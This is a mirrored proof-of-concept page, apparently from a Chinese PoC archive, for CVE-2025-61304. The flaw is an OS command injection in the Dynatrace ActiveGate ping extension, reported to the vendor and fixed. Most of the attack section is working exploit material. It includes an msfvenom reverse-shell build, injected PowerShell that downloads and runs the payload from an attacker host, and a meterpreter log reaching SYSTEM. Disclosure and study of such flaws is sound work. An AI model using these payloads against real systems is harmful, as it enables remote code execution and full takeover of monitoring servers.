目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2025-61304 PoC — Dynatrace ActiveGate 安全漏洞

来源
https://github.com/pentastic-be/CVE-2025-61304
关联漏洞
标题:Dynatrace ActiveGate 安全漏洞 (CVE-2025-61304)
Description:Dynatrace ActiveGate是美国Dynatrace公司的一个监控平台中的网关组件。 Dynatrace ActiveGate 1.016及之前版本存在安全漏洞,该漏洞源于对特制ip地址处理不当,可能导致OS命令注入攻击。
Description
OS command injection vulnerability in Dynatrace ActiveGate ping extension up to 1.016 via crafted ip address
介绍
# CVE-2025-61304
"OS command injection vulnerability in Dynatrace ActiveGate ping extension up to 1.016 via crafted ip address"

In the background the ping extension is using the command prompt of Windows to perform the ping. The input field for the Test Target Host is also 1024 chars long. After the ip-address you can write additional commands for the ActiveGate to execute, simply by using an '&'.

Reported to Dynatrace and fixed with this commit:
https://github.com/Dynatrace/dynatrace-api/pull/99

Exploit RCE to add user:

<img width="1261" height="957" alt="add_user" src="https://github.com/user-attachments/assets/acbfdc73-fe90-4c29-b106-70a283695230" />

Local user list before and after:

<img width="1274" height="746" alt="exploit" src="https://github.com/user-attachments/assets/344948ae-08d6-431c-9101-aa0be2633998" />

# Other example payloads: 

1. Create a meterpreter reverse shell:
```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.51.200 LPORT=4444 -f exe > mshell.exe
```

2. Download and Execute the shell on the ActiveGate through the Cloud interface using the ping extension:
```
google&powershell.exe $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest http://192.168.51.200/mshell.exe -OutFile c:\test\mshell.exe

google&c:\test\mshell.exe

```

3. Resulting session
```
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.51.200:4444 

[*] Sending stage (200262 bytes) to 192.168.51.54
[*] Meterpreter session 3 opened (192.168.51.200:4444 -> 192.168.51.54:49800 ) at 2023-01-21 19:02:16 +0100

meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > getsystem 
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > sysinfo
Computer        : WIN-9493M3CRTDV
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
```
文件快照

 [4.0K]  /data/pocs/d5f190eb8be8a4cf85d050d4c8f4415706de1e4f
└── [2.1K]  README.md

1 directory, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。